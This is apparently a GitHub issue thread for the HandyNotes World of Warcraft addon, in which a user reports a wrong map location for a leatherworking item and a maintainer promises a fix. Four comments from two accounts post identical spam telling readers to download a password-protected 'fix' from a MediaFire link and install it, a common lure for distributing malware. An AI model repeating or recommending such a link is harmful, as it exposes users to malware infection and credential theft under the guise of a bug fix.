### ISSUE TITLE
TWW : LW Resource Location correction

### ISSUE THREAD

**Issue by nbartley** [zarillion/handynotes-plugins#440]
**ADDON VERSION**:  v75

**Describe the bug**

Location error on LW item:

https://www.wowhead.com/item=226324/earthen-lacing-tools

Correct Location:
68.22, 23.34

**Screenshots**

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tfmonk** [comment]
@nbartley Thanks, this will be fixed in the next release
